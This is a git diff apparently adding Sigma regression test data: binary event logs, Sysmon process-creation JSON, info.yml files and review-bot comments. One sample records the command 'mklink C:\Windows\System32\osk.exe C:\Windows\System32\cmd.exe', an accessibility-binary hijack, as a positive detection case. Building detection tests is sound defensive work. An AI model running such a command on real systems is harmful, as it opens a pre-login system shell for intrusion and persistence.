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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json new file mode 100644 index 000000000..f1b1d7319 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:04:38.507492Z" + } + }, + "EventRecordID": 8302863, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:04:38.497", + "ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002", + "ProcessId": 7816, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c assoc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} 
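Review bot: the sample's `CommandLine` is `cmd /c assoc`, which with no argument only lists the current file associations, while the rule under test is titled "Change Default File Association Via Assoc"; this positive sample therefore does not exercise an actual association change. Either document in info.yml that the rule is meant to fire on a bare `assoc` listing (and accept the false-positive surface that implies), or capture a sample in which assoc is given an `.ext=filetype` argument so the regression test reflects the behaviour named in the title.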
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml new file mode 100644 index 000000000..ce83d82c8 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml @@ -0,0 +1,13 @@ +id: 1a0606d6-3470-45e5-aeea-16098357e709 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + title: Change Default File Association Via Assoc +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx 
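Review bot: `date: 2025-10-24` precedes the capture time of the sample it describes (`SystemTime` 2025-10-25T13:04:38Z and `UtcTime` 2025-10-25 13:04:38.497 in the accompanying .json), so the field cannot be the capture date as written; correct it or, if `date` is meant to be when the metadata was authored, say so in the CI documentation so the mismatch does not look like a mislabelled sample. `description: N/A` should also be filled in here, as on the other info.yml files in this patch.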
diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx new file mode 100644 index 0000000000000000000000000000000000000000..e3402971fe982884aa8f91a28bd1a7262fbea8c5 GIT binary patch literal 69632 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 L5l{q{5d!}Q)H$!F literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json new file mode 100644 index 000000000..7e984c958 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:15:18.885132Z" + } + }, + "EventRecordID": 8471746, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:15:18.879", + "ProcessGuid": "5AA13A44-CD66-68FC-F12F-000000004002", + "ProcessId": 8620, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"mklink C:\\Windows\\System32\\osk.exe C:\\Windows\\System32\\cmd.exe\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" 
+ } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml new file mode 100644 index 000000000..faafff6e7 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml @@ -0,0 +1,13 @@ +id: 20e20ac5-43f2-40a3-811c-53466d1be222 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: e9b61244-893f-427c-b287-3e708f321c6b + title: Potential Privilege Escalation Using Symlink Between Osk and Cmd +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/e9b61244-893f-427c-b287-3e708f321c6b.evtx 
